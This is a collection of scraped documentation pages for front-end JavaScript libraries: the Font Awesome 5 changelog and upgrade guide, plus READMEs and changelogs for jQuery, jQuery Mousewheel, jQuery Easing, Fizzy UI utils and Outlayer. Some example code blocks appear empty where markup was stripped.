# Change Log All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](http://keepachangelog.com/) and this project adheres to [Semantic Versioning](http://semver.org/). **Note that references to the Font-Awesome-Pro repository refer to a GitHub repository that is by invitation only. You will get a 404 - Not Found if you do not have access** --- ## [5.1.0](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.1.0) - 2018-06-20 **Minor version upgrade notice: there are some backward-incompatible changes to this release. See the [UPGRADING.md guide](https://github.com/FortAwesome/Font-Awesome/blob/master/UPGRADING.md) for more information.** ### Added * New Emoji, Design, and Travel category pack * Another group of requested and commissioned icons * Version 4 shim for Web Fonts with CSS * New simplified download and NPM packages * @fortawesome/fontawesome-free and @fortawesome/fontawesome-pro NPM packages that match what's available in the CDN and .ZIP files * Brand icons rev, nimblr, megaport, mailchimp, hornbill, wix, weebly, themeco, squarespace, aws, shopware * API method toHtml() for converting abstract objects to HTML * API method counter() to generate Layers Counters * API method watch() to configure MutationObserver and watch DOM for icon changes and additions ### Changed * Relocating sponsor data to a separate sponsors.yml * Updated teamspeak brand icon * No more default exports in the CommonJS/ES packages (anything installed from NPM) * Greatly improved performance and rendering of CSS pseudo-elements with SVG and JavaScript * Configuration of SVG with JavaScript can now be done with attributes on the script tag * SVG with JavaScript pseudo-elements now match syntax (font-family, font-weight) of Web Fonts with CSS ### Fixed * Tree shaking of all NPM packages by default * Alignment of the book-open and dice-six icon * Correcting creative-commons * Incorrect license on the fontawesome-common-types package * Improve ligatures that share a base name with another ligature * Correcting solid style of the digital-tachograph icon * Prevent duplicating classes in some scenarios with SVG with JavaScript * Duplicate insertion of CSS when insertCss() method was called * Missing TypeScript definitions for the free-brands-svg-icons package --- ## [5.0.13](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.13) - 2018-05-10 ### Added * 68 icons to Free and 165 to Pro of the most requested icons in Font Awesome --- ## [5.0.12](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.12) - 2018-05-03 ### Added * A long time ago in a galaxy far, far away some icons were added ### Fixed * Renamed the r brand to r-project to prevent ligature collision with the "r" glyph --- ## [5.0.11](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.11) - 2018-05-01 ### Added * 16 new user icons * Full set of Creative Commons symbols * Regular style comment-dots used for v4 comment-alt in shim * Top 6 brand icons: r, ebay, mastodon, researchgate, keybase, teamspeak ### Changed * Revised slider icons FortAwesome/Font-Awesome#11872 * Make desktop typeface easier to find in apps that support ligature previews ### Fixed * Remove errant XML entity from the lastfm-square icon FortAwesome/Font-Awesome#12847 * Correcting paths in cloud icons FortAwesome/Font-Awesome-Pro#920 --- ## [5.0.10](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.10) - 2018-04-10 ### Added * New java brand icon FortAwesome/Font-Awesome#386 ### Changed * Updating depth of dna icon * Updating pied-piper, adding pied-piper-hat ### Fixed * Correcting path errors on readme icon FortAwesome/Font-Awesome#12754 * Light style of lamp icon FortAwesome/Font-Awesome#12725 --- ## [5.0.9](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.9) - 2018-03-27 ### Added * New Chat icon pack and category * New Charity icon pack and category * New Moving icon pack and category * New icons hands and hand-holding ### Changed * Updated flipboard, readme, and houzz brand icon * Making all solid icons in the medical icon pack free * Updated hand-holding-box and hand-receiving in the Light style ### Fixed * Missing box-sizing CSS property for fa-layers-counter --- ## [5.0.8](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.8) - 2018-03-01 ### Fixed * OTF font files missing ligatures for Pro styles FortAwesome/Font-Awesome#12486 FortAwesome/Font-Awesome-Pro#1034 --- ## [5.0.7](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.7) - 2018-02-26 ### Added * New Logistics category * New Medical category * Individual SVG files available from the Font Awesome CDN * Additional search terms ### Changed * Apple brand icon update FortAwesome/Font-Awesome#12337 * Disable mutation observers with fontawesome.noAuto() is called * License information now references https URL scheme ### Fixed * Missing TypeScript names FortAwesome/react-fontawesome#83 * Adding categories metadata FortAwesome/Font-Awesome#12034 * TypeScript improvement for fontawesome.layer() * Correcting a melting, wobbling, weird-looking whistle --- ## [5.0.6](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.6) - 2018-01-25 ### Fixed * @fortawesome/fontawesome-pro-light missing submodules --- ## [5.0.5](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.5) - 2018-01-25 ### Added * New Sports category * New Chess category * Added brand icons for flipboard, php, quinscape, and hips ### Fixed * Sass and Less mixin fa-icon() now uses ems instead of percentage * Corrected misspelling of "Alternate" in category labels * Improved TypeScript definitions for @fortawesome/fontawesome * Server-side rendering was failing due to DOM-specific object access * SVG attributes "data-fa-processed" renamed to "data-fa-i2svg", only applies if rendered with i2svg() method --- ## [5.0.4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.4) - 2018-01-10 ### Changed * Updating all NPM package READMEs ### Fixed * Improving TypeScript exports and fixing some incorrect definitions * TypeScript error when importing entire style Fort-Awesome/Font-Awesome#12072 * Pseudo-elements erasing text contents in parent container Fort-Awesome/Font-Awesome-Pro#11995 * fa-layers-text misalignment when using Bootstrap Fort-Awesome/Font-Awesome#11871 --- ## [5.0.3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.3) - 2018-01-08 ### Added * Adding elementor, youtube-square brand icons * Adding window-minimize to the Free subset * TypeScript support for all NPM packages ### Fixed * Corrected uneven spacing in university, address-book, address-card, id-badge, id-card, mouse-pointer, phone-volume, portrait, user-alt, user-circle, user-md, user-plus, user-times, user , users * Corrected uneven spacing in brand icons behance-square, dashcube, discourse, ember, erlang, fort-awesome, js-square, laravel, mix, patreon, palfed, phoenix-framework, node-js, skyatlas, stack-exchange, stripe, viber, weixin, yahoo , yoast --- ## [5.0.2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.2) - 2017-12-19 ### Added * Adding amazon-pay, cc-amazon-pay, korvue, ethereum brand icons * Adding stopwatch to Free version ### Changed * Ligatures now support capital case, all caps, and title case ### Fixed * NPM packages now behave the same way as CDN and browser-specific packages FortAwesome/Font-Awesome-Pro#727 FortAwesome/Font-Awesome-Pro#896 FortAwesome/Font-Awesome-Pro#891 * Icon doesn't change when pseudo-element content changes FortAwesome/Font-Awesome-Pro#839 * Invalid XML in sprites FortAwesome/Font-Awesome-Pro#927 * Incorrect version in Sass and Less variable files --- ## [5.0.1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.1) - 2017-12-08 ### Added * Adding font-awesome-flag, lock-open, redo-alt, sync-alt, undo-alt to the Free version * New NPM packages `fontawesome-free-webfonts` and `fontawesome-pro-webfonts` * Adding old icon names to search terms for renamed icons * Extensive metadata added to the `advanced-options` directory * Adding stripe-s brand icon * Adding typo3 brand icon ### Changed * Updated dropbox brand icon to match new branding guidelines * Updated firefox brand icon * Updated strava brand icon * OTF font file now include a space character ### Fixed * OTF font file now supports different styles in Windows * OTF font file "j" character now has correct space on the right * Modifying the `class` attribute on an existing `` will now precede other link and style definitions * BREAKING `fontawesome.text` and `fontawesome.icon` now use `styles` param instead of `style` * Updated sizing for twitter, discord, youtube * Class fa-li now respects line-height and has new recommended markup (see included docs) ### Fixed * Duplicate `style` tags being added in the head FortAwesome/Font-Awesome-Pro#858 * Error with icon composition/masking that caused a confusing error message * An error when using pseudo elements and the element is empty (Array.reduce error) * Icons not being replaced with SVG if the text content is not empty --- ## [5.0.0-rc4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc4) - 2017-10-27 ### Added * Ligature support in the OTF font * Vue.js brand icon * Sass and Less brand icons * Autoprefixer brand icon * Individual icon imports in icon packages FortAwesome/Font-Awesome-Pro#808 ### Changed * Better poo eyes * Renamed HTML status classes to `fontawesome-i2svg-active`, `fontawesome-i2svg-pending`, `fontawesome-i2svg-complete` * HTML status class for active is added only after the first batch of icon replacements occur * Added mention of newer versions of iOS in documentation FortAwesome/Font-Awesome-Pro#810 ### Fixed * Performance and missing features with mutation observer (should fix FortAwesome/Font-Awesome-Pro#813) * Incorrect handling of icon class and style attributes when using autoReplace = 'nest' FortAwesome/Font-Awesome-Pro#809 * Pseudo elements not added or removed when class mutations occur FortAwesome/Font-Awesome-Pro#821 --- ## [5.0.0-rc3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc3) - 2017-10-13 ### Added * Node.js brand icon FortAwesome/Font-Awesome-Pro#779 * React brand icon FortAwesome/Font-Awesome-Pro#780 * OSI brand icon FortAwesome/Font-Awesome-Pro#748 * Add a class to the html element when icon replacement is complete FortAwesome/Font-Awesome-Pro#778 * Add support for symbols in API including ability to name the symbol * Use CSS pseudo elements (:before and :after) to make trigger SVG replacements ### Changed * Switched the locations of fork and knife in utensils-alt FortAwesome/Font-Awesome-Pro#466 * Updated the AWS brand icon FortAwesome/Font-Awesome-Pro#735 * Updated Apple App Store icon FortAwesome/Font-Awesome-Pro#728 ### Fixed * Do not throw an error if icon is missing when calling icon() method in API * Ensure that unicode values do not change between releases * Version field is missing in fontawesome-pro-brands/package.json FortAwesome/Font-Awesome-Pro#781 * Repeated commenting out of fa-layers when i2svg is called FortAwesome/Font-Awesome-Pro#788 * Title not showing up correctly for SVG FortAwesome/Font-Awesome-Pro#786 --- ## [5.0.0-rc2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc2) - 2017-09-22 ### Added * Brand icons: accusoft, ns8, uniregistry ### Fixed * Link to the npm package in the docs FortAwesome/Font-Awesome-Pro#729 * Incorrect reference to fontawesome-pro.js in docs --- ## [5.0.0-rc1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc1) - 2017-09-15 ### Changed * New Bitbucket logo FortAwesome/Font-Awesome-Pro#720 * Modifed the star icons to match use case better FortAwesome/Font-Awesome-Pro#710 * Switched names of css3 and css3-alt to reflect correct branding ### Fixed * Correct whitespace with the Visa logo FortAwesome/Font-Awesome-Pro#719 * Improve OTF support by passing through FontForge FortAwesome/Font-Awesome-Pro#565 * Fonts with "undefined" name FortAwesome/Font-Awesome-Pro#711 * Shims will only function if using old prefix of "fa" FortAwesome/Font-Awesome-Pro#692 * Added missing "youtube" icon to categories --- ## [5.0.0-beta7](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta7) - 2017-09-11 ### Added * Ability to nest the `` FortAwesome/Font-Awesome-Pro#624 * Define icons as symbols and leverage SVG sprites FortAwesome/Font-Awesome-Pro#629 * Added alternative CSS3 logo FortAwesome/Font-Awesome-Pro#682 ### Changed * Power Transforms now execute inside the SVG instead of on the root element * Filenames have changed to reflect a better division between Font Awesome Free and Pro ### Fixed * More improvements to the version 4 shim FortAwesome/Font-Awesome-Pro#673 FortAwesome/Font-Awesome-Pro#678 FortAwesome/Font-Awesome-Pro#686 FortAwesome/Font-Awesome-Pro#687 FortAwesome/Font-Awesome-Pro#692 * Animation support for inline SVG now works as expected FortAwesome/Font-Awesome-Pro#662 --- ## [5.0.0-beta6](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta6) - 2017-09-01 ### Added * Ability to flip horizontal and vertical with CSS classes fa-flip-horizontal and fa-flip-vertical * New film-alt icon that allows for layering other icons * Microsoft brand ### Changed * New YouTube branding FortAwesome/Font-Awesome-Pro#646 ### Fixed * Fixed a bunch of shim-related issues * Cogs off center FortAwesome/Font-Awesome-Pro#663 * Corrected icons/categories.yml with canonical names --- ## [5.0.0-beta5](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta5) - 2017-08-25 ### Added * Full parity with Font Awesome 4! 616 total core icons in each style * 297 total brand and logo icons * Separate CSS file to accompany the SVG Framework FortAwesome/Font-Awesome-Pro#627 * Alternative to the dots icon FortAwesome/Font-Awesome-Pro#608 * Made window icons consistent FortAwesome/Font-Awesome-Pro#611 ### Fixed * Production builds not correctly being detected FortAwesome/Font-Awesome-Pro#631 --- ## [5.0.0-beta4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta4) - 2017-08-18 ### Added * 590 total core icons in each style * 291 total brand and logo icons ### Fixed * Reduced the size of JS file from 66 to 22 kb * Regression caused by with web font alignment FortAwesome/Font-Awesome-Pro#460 --- ## [5.0.0-beta3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta3) - 2017-08-15 ### Added * 583 total core icons in each style ### Fixed * Documentation improvements and fixes FortAwesome/Font-Awesome-Pro#586 * Vertical alignment of TTF and OTF fonts FortAwesome/Font-Awesome-Pro#460 * The "fa_500px" icon should be named "fa500px" FortAwesome/Font-Awesome-Pro#578 --- ## [5.0.0-beta2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta2) - 2017-08-11 ### Added * 570 total core icons in each style * 291 total brand and logo icons * NPM (ES6, CommonJS, AMD) packages for use with other JavaScript libraries and tools FortAwesome/Font-Awesome-Pro#574 * Added a guide to choosing which implementation is best for you FortAwesome/Font-Awesome-Pro#532 ### Changed * Showing a missing icon is now configurable FortAwesome/Font-Awesome-Pro#569 ### Fixed * Composition framework now works in browsers that do not support transform-origin FortAwesome/Font-Awesome-Pro#564 --- ## [5.0.0-beta1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta1) - 2017-08-04 ### Added * 524 total core icons in each style * 289 total brand and logo icons * New composition framework FortAwesome/Font-Awesome-Pro#537 * Animated indicator if you use an icon that does not exist ### Changed * Basic linting for Sass and Less files * Add JavaScript guard block to prevent leaking errors * Add support for automatic accessibility to SVG Framework Layers ### Fixed * Regression where stacks and pulled and bordered were not working in SVG Framework * SVG sprite example had confusing inline styles FortAwesome/Font-Awesome-Pro#549 * Make getting started page more consistent between examples FortAwesome/Font-Awesome-Pro#544 * Added missing sizes fa-[6-10], xs, sm FortAwesome/Font-Awesome-Pro#546 * Title tag missing in SVG sprites FortAwesome/Font-Awesome-Pro#536 --- ## [5.0.0-alpha7](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha7) - 2017-07-28 ### Added * 451 total core icons in each style * 281 total brand and logo icons * Less support is back! * OpenType (.otf) file formats for web fonts ### Changed * Changes the fa-spin animation to go from 0deg to 360deg to eliminate hitch FortAwesome/Font-Awesome-Pro#522 * Improved mutation handling FortAwesome/Font-Awesome-Pro#517 ### Fixed * fa-fw now works correctly with the SVG framework FortAwesome/Font-Awesome-Pro#530 * Removed execute bit on some icon files FortAwesome/Font-Awesome-Pro#520 --- ## [5.0.0-alpha6](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha6) - 2017-07-21 ### Added * 410 total core icons in each style * 270 total brand and logo icons * All new Font Awesome 4 shim file * Beginnings of a public JS API FortAwesome/Font-Awesome-Pro#512 ### Changed * Added Firefox ESR and Chrome for Businesses to browser compatibility FortAwesome/Font-Awesome-Pro#506 ### Fixed * Ensure that SVG title attributes are unique * Fixed incorrect viewBox sizes FortAwesome/Font-Awesome-Pro#492 * Fix chart-area alignment in the solid style FortAwesome/Font-Awesome-Pro#508 * Add missing xmlns attributes in some SVGs FortAwesome/Font-Awesome-Pro#509 --- ## [5.0.0-alpha5](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha5) - 2017-07-14 ### Added * 228 total brand and logo icons * New transform framework for sizing, moving, rotating, and flipping icons * New icon counters * New layers framework * New text overlays * Auto-comments with the original source icons alongside SVG replacements ### Changed * Autoprefixer to correctly add browser prefixes for supported browsers * Removed browser-specific CSS properties in Sass source files (now relies on autoprefixer) ### Fixed * The rotation on checkmark icons * Other icon feedback from previous weeks * Correct fixed width settings to 1.25em (based on the new 16px grid) * Icons displaying as block instead of inline-block in IE and older Safari --- ## [5.0.0-alpha4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha4) - 2017-07-07 ### Added * 93 brand icons --- ## [5.0.0-alpha3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha3) - 2017-06-30 ### Added * 95 additional icons; including file types, directional, and some existing and new brand icons ### Fixed * Wrong content type in generated CSS FortAwesome/Font-Awesome-Pro#458 * Removal of query string from static resources FortAwesome/Font-Awesome-Pro#458 * SVG font ID's are incorrect in webfont implementation FortAwesome/Font-Awesome-Pro#474 --- ## [5.0.0-alpha2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha2) - 2017-06-27 ### Added * How/When to upgrade from FA4 to FA5 FortAwesome/Font-Awesome-Pro#454 ### Fixed * Links to SVG files broken in the example files FortAwesome/Font-Awesome-Pro#456 * Misnamed icon names in examples FortAwesome/Font-Awesome-Pro#445 * Mangled HTML in the Getting Started example FortAwesome/Font-Awesome-Pro#442 * Bad grammar and typos FortAwesome/Font-Awesome-Pro#443 * fas-arrow-to-top is identical to fas-arrow-to-right FortAwesome/Font-Awesome-Pro#423 * Vertical alignment issues with webfont implementation FortAwesome/Font-Awesome-Pro#444 * Add browser compatibility tables to demo FortAwesome/Font-Awesome-Pro#435 * Remove MAC OS feces from builds FortAwesome/Font-Awesome-Pro#437 * TTF naming issues that prevent correct usage/installation FortAwesome/Font-Awesome-Pro#450 * Correct CSS for SVG framework stacking, was reversed from normal FortAwesome/Font-Awesome-Pro#452 --- ## [5.0.0-alpha1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha1) - 2017-06-23 ### Added * 300+ more icons * Brands pack * New JavaScript based SVG Framework * New SVG Sprites based framework * Source SVGs * Documentation with a convenient build-in web server ### Changed * New directory structure

Upgrading Guide
# Upgrading Guide See the [CHANGELOG.md](/build/assets/bower_components/font-awesome/CHANGELOG/) for detailed information about what has changed between versions. This guide is useful to figure out what you need to do between breaking changes. As always, [submit issues](https://github.com/FortAwesome/Font-Awesome/issues/new) that you run into with this guide or with these upgrades to us. ## 5.0.x to 5.1.0 ### New packages available for browser-only integration **If you were previously using @fortawesome/fontawesome you need to switch to one of the new packages.** Our Free and Pro CDN provide access to JS, CSS, sprites, and separate SVG files. We've now made these files conveniently available through NPM. * [@fortawesome/fontawesome-free](https://www.npmjs.com/package/@fortawesome/fontawesome-free) * @fortawesome/fontawesome-pro (private package, requires Pro subscription) If you are familiar with the paths and options available with the CDN these packages should be familiar. Information about [Font Awesome Pro subscriptions](https://fontawesome.com/pro) can be found in your [Font Awesome awesome account](https://fontawesome.com/account/services). ### Renamed packages The following packages have been renamed as part of 5.1.0 of Font Awesome. _All packages are in the [@fortawesome NPM scope](https://www.npmjs.com/search?q=scope:fortawesome&page=1&ranking=optimal)_ | Old package(1) | New package | |---------------------------|------------------------| | fontawesome-free-webfonts | fontawesome-free | | fontawesome-pro-webfonts | fontawesome-pro | | fontawesome-free-solid | free-solid-svg-icons | | fontawesome-free-regular | free-regular-svg-icons | | fontawesome-free-brands | free-brands-svg-icons | | fontawesome-pro-solid | pro-solid-svg-icons | | fontawesome-pro-regular | pro-regular-svg-icons | | fontawesome-pro-light | pro-light-svg-icons | (1) Old packages have now been deprecated. They are still available but will only receive high priority patch release fixes. **You'll need to update your package.json file with the renamed packages and new versions.** ### No more default imports Recently we spent a good deal of time supporting TypeScript to enable us to create the Angular Font Awesome component. During that adventure we [were](https://basarat.gitbooks.io/typescript/docs/tips/defaultIsBad.html) [convinced](https://blog.neufund.org/why-we-have-banned-default-exports-and-you-should-do-the-same-d51fdc2cf2ad) that we were going to remove default exports from all of our components, libraries, and packages. This is complete with the umbrella release of `5.1.0` of Font Awesome. What does that mean? ~~Old way:~~ ```javascript import fontawesome from '@fortawesome/fontawesome' import solid from '@fortawesome/fontawesome-free-solid' import faTwitter from '@fortawesome/fontawesome-free-brands/faTwitter' import FontAwesomeIcon from '@fortawesome/vue-fontawesome' library.add(solid, faTwitter) ``` New way: ```javascript import { library, dom } from '@fortawesome/fontawesome-svg-core' import { fas } from '@fortawesome/free-solid-svg-icons' import { faTwitter } from '@fortawesome/free-brands-svg-icons' import { FontAwesomeIcon } from '@fortawesome/vue-fontawesome' library.add(fas, faTwitter) // Kicks off the process of finding tags and replacing with

Mouse Wheel ChangeLog
# Mouse Wheel ChangeLog ## 3.1.13 * Update copyright notice and license to remove years * Create the correct compressed version * Remove the obsolete jQuery Plugin Registry file ## 3.1.12 * Fix possible 0 value for line height when in delta mode 1 ## 3.1.11 * Fix version number for package managers... ## 3.1.10 * Fix issue with calculating line height when using older versions of jQuery * Add offsetX/Y normalization with setting to turn it off * Cleans up data on teardown ## 3.1.9 * Fix bower.json file * Updated how the deltas are adjusted for older mousewheel based events that have deltas that are factors of 120. * Add $.event.special.mousewheel.settings.adjustOldDeltas (defaults to true) to turn off adjusting of old deltas that are factors of 120. You'd turn this off if you want to be as close to native scrolling as possible. ## 3.1.8 * Even better handling of older browsers that use a wheelDelta based on 120 * And fix version reported by `$.event.special.mousewheel` ## 3.1.7 * Better handle the `deltaMode` values 1 (lines) and 2 (pages) * Attempt to better handle older browsers that use a wheelDelta based on 120 ## 3.1.6 * Deprecating `delta`, `deltaX`, and `deltaY` event handler arguments * Update actual event object with normalized `deltaX `and `deltaY` values (`event.deltaX`, `event.deltaY`) * Add `deltaFactor` to the event object (`event.deltaFactor`) * Handle `> 0` but `< 1` deltas better * Do not fire the event if `deltaX` and `deltaY` are `0` * Better handle different devices that give different `lowestDelta` values * Add `$.event.special.mousewheel.version` * Some clean up ## 3.1.5 * Bad release because I did not update the new `$.event.special.mousewheel.version` ## 3.1.4 * Always set the `deltaY` * Add back in the `deltaX` and `deltaY` support for older Firefox versions ## 3.1.3 * Include `MozMousePixelScroll` in the to fix list to avoid inconsistent behavior in older Firefox ## 3.1.2 * Include grunt utilities for development purposes (jshint and uglify) * Include support for browserify * Some basic cleaning up ## 3.1.1 * Fix rounding issue with deltas less than zero ## 3.1.0 * Fix Firefox 17+ issues by using new wheel event * Normalize delta values * Adds horizontal support for IE 9+ by using new wheel event * Support AMD loaders ## 3.0.6 * Fix issue with delta being 0 in Firefox ## 3.0.5 * jQuery 1.7 compatibility ## 3.0.4 * Fix IE issue ## 3.0.3 * Added `deltaX` and `deltaY` for horizontal scrolling support (Thanks to Seamus Leahy) ## 3.0.2 * Fixed delta being opposite value in latest Opera * No longer fix `pageX`, `pageY` for older Mozilla browsers * Removed browser detection * Cleaned up the code ## 3.0.1 * Bad release... creating a new release due to plugins.jquery.com issue :( ## 3.0 * Uses new special events API in jQuery 1.2.2+ * You can now treat `mousewheel` as a normal event and use `.bind`, `.unbind` and `.trigger` * Using jQuery.data API for expandos ## 2.2 * Fixed `pageX`, `pageY`, `clientX` and `clientY` event properties for Mozilla based browsers ## 2.1.1 * Updated to work with jQuery 1.1.3 * Used one instead of bind to do unload event for clean up ## 2.1 * Fixed an issue with the unload handler ## 2.0 * Major reduction in code size and complexity (internals have change a whole lot) ## 1.0 * Fixed Opera issue * Fixed an issue with children elements that also have a mousewheel handler * Added ability to handle multiple handlers

Fizzy UI utils
# Fizzy UI utils UI utility & helper functions Used in [Flickity](http://flickity.metafizzy.co), [Isotope](http://isotope.metafizzy.co), [Masonry](http://masonry.desandro.com), [Draggabilly](http://draggabilly.desandro.com) ## Install Bower: `bower install fizzy-ui-utils --save` npm: `npm install fizzy-ui-utils --save` ## API ``` js // fizzyUIUtils is the browser global var utils = fizzyUIUtils; // ---- ---- // utils.extend( a, b ) // extend object utils.modulo( num, div ) // num [modulo] div utils.makeArray( obj ) // make array from object utils.removeFrom( ary, obj ) // remove object from array utils.getParent( elem, selector ) // get parent element of an element, given a selector string utils.getQueryElement( elem ) // if elem is a string, use it as a selector and return element Class.prototype.handleEvent = utils.handleEvent; // enable Class.onclick when element.addEventListener( 'click', this, false ) utils.filterFindElements( elems, selector ) // iterate through elems, filter and find all elements that match selector utils.debounceMethod( Class, methodName, threhold ) // debounce a class method utils.docReady( callback ) // trigger callback on document ready utils.toDashed( str ) // 'camelCaseString' -> 'camel-case-string' utils.htmlInit( Class, namespace ) // on document ready, initialize Class on every element // that matches js-namespace // pass in JSON options from element's data-options-namespace attribute ``` --- [MIT license](http://desandro.mit-license.org/). Have at it. By [Metafizzy](http://metafizzy.co)

@fortawesome/free-regular-svg-icons - SVG with JavaScript version
# @fortawesome/free-regular-svg-icons - SVG with JavaScript version > "I came here to chew bubblegum and install Font Awesome 5 - and I'm all out of bubblegum" [![npm](https://img.shields.io/npm/v/@fortawesome/free-regular-svg-icons.svg?style=flat-square)](https://www.npmjs.com/package/@fortawesome/free-regular-svg-icons) ## Installation ``` $ npm i --save @fortawesome/free-regular-svg-icons ``` Or ``` $ yarn add @fortawesome/free-regular-svg-icons ``` ## Documentation Get started [here](https://fontawesome.com/get-started/svg-with-js). Continue your journey [here](https://fontawesome.com/how-to-use/svg-with-js). Or go straight to the [API documentation](https://fontawesome.com/how-to-use/font-awesome-api). ## Issues and support Start with [GitHub issues](https://github.com/FortAwesome/Font-Awesome/issues) and ping us on [Twitter](https://twitter.com/fontawesome) if you need to.

jQuery Easing Plugin
# jQuery Easing Plugin What is it? A jQuery plugin from GSGD to give advanced easing options. More info [here](http://gsgd.co.uk/sandbox/jquery/easing) For CDN please use CloudFlare [`https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.min.js`](https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.min.js) to help my host. Thank you. # AMD or CommonJS usage ```js // CommonJS var jQuery = require('jquery'); require('jquery.easing')(jQuery); // AMD define(['jquery', 'jquery.easing'], function (jQuery, easing) { easing(jQuery) }) ``` # Building and testing * Clone the repo * `npm install` * Make changes * Test against files in `/examples` * Build minified version with `npm run build`

jQuery
# jQuery > jQuery is a fast, small, and feature-rich JavaScript library. For information on how to get started and how to use jQuery, please see [jQuery's documentation](http://api.jquery.com/). For source files and issues, please visit the [jQuery repo](https://github.com/jquery/jquery). If upgrading, please see the [blog post for 3.3.1](https://blog.jquery.com/2017/03/20/jquery-3.3.1-now-available/). This includes notable differences from the previous version and a more readable changelog. ## Including jQuery Below are some of the most common ways to include jQuery. ### Browser #### Script tag ```html ``` #### Babel [Babel](http://babeljs.io/) is a next generation JavaScript compiler. One of the features is the ability to use ES6/ES2015 modules now, even though browsers do not yet support this feature natively. ```js import $ from "jquery"; ``` #### Browserify/Webpack There are several ways to use [Browserify](http://browserify.org/) and [Webpack](https://webpack.github.io/). For more information on using these tools, please refer to the corresponding project's documention. In the script, including jQuery will usually look like this... ```js var $ = require("jquery"); ``` #### AMD (Asynchronous Module Definition) AMD is a module format built for the browser. For more information, we recommend [require.js' documentation](http://requirejs.org/docs/whyamd.html). ```js define(["jquery"], function($) { }); ``` ### Node To include jQuery in [Node](nodejs.org), first install with npm. ```sh npm install jquery ``` For jQuery to work in Node, a window with a document is required. Since no such window exists natively in Node, one can be mocked by tools such as [jsdom](https://github.com/tmpvar/jsdom). This can be useful for testing purposes. ```js require("jsdom").env("", function(err, window) { if (err) { console.error(err); return; } var $ = require("jquery")(window); }); ```

Outlayer
# Outlayer _Brains and guts of a layout library_ Outlayer is a base layout class for layout libraries like [Isotope](http://isotope.metafizzy.co), [Packery](http://packery.metafizzy.co), and [Masonry](http://masonry.desandro.com) Outlayer layouts work with a container element and children item elements. ``` html

...
``` ## Install Install with [Bower](http://bower.io): `bower install outlayer` [Install with npm](http://npmjs.org/package/outlayer): `npm install outlayer` ## Outlayer.create() Create a layout class with `Outlayer.create()` ``` js var Layout = Outlayer.create( namespace ); // for example var Masonry = Outlayer.create('masonry'); ``` + `namespace` _{String}_ should be camelCased + returns `LayoutClass` _{Function}_ Create a new layout class. `namespace` is used for jQuery plugin, and for declarative initialization. The `Layout` inherits from [`Outlayer.prototype`](docs/outlayer.md). ``` var elem = document.querySelector('.selector'); var msnry = new Masonry( elem, { // set options... columnWidth: 200 }); ``` ## Item Layouts work with Items, accessible as `Layout.Item`. See [Item API](docs/item.md). ## Declarative An Outlayer layout class can be initialized via HTML, by setting an attribute of `data-namespace` on the element. Options are set in JSON. For example: ``` html
...
``` The declarative attributes and class will be dashed. i.e. `Outlayer.create('myNiceLayout')` will use `data-my-nice-layout` as the attribute. ## .data() Get a layout instance from an element. ``` var myMasonry = Masonry.data( document.querySelector('.grid') ); ``` ## jQuery plugin The layout class also works as jQuery plugin. ``` js // create Masonry layout class, namespace will be the jQuery method var Masonry = Outlayer.create('masonry'); // rock some jQuery $( function() { // .masonry() to initialize var $grid = $('.grid').masonry({ // options... }); // methods are available by passing a string as first parameter $grid.masonry( 'reveal', elems ); }); ``` ## RequireJS To use Outlayer with [RequireJS](http://requirejs.org/), you'll need to set some config. Set [baseUrl](http://requirejs.org/docs/api.html#config-baseUrl) to bower_components and set a [path config](http://requirejs.org/docs/api.html#config-paths) for all your application code. ``` js requirejs.config({ baseUrl: 'bower_components', paths: { app: '../' } }); requirejs( [ 'outlayer/outlayer', 'app/my-component.js' ], function( Outlayer, myComp ) { new Outlayer( /*...*/ ) }); ``` Or set a path config for all Outlayer dependencies. ``` js requirejs.config({ paths: { 'ev-emitter': 'bower_components/ev-emitter', 'get-size': 'bower_components/get-size', 'matches-selector': 'bower_components/matches-selector' } }); ``` ## MIT license Outlayer is released under the [MIT license](http://desandro.mit-license.org).

Fizzy UI utils
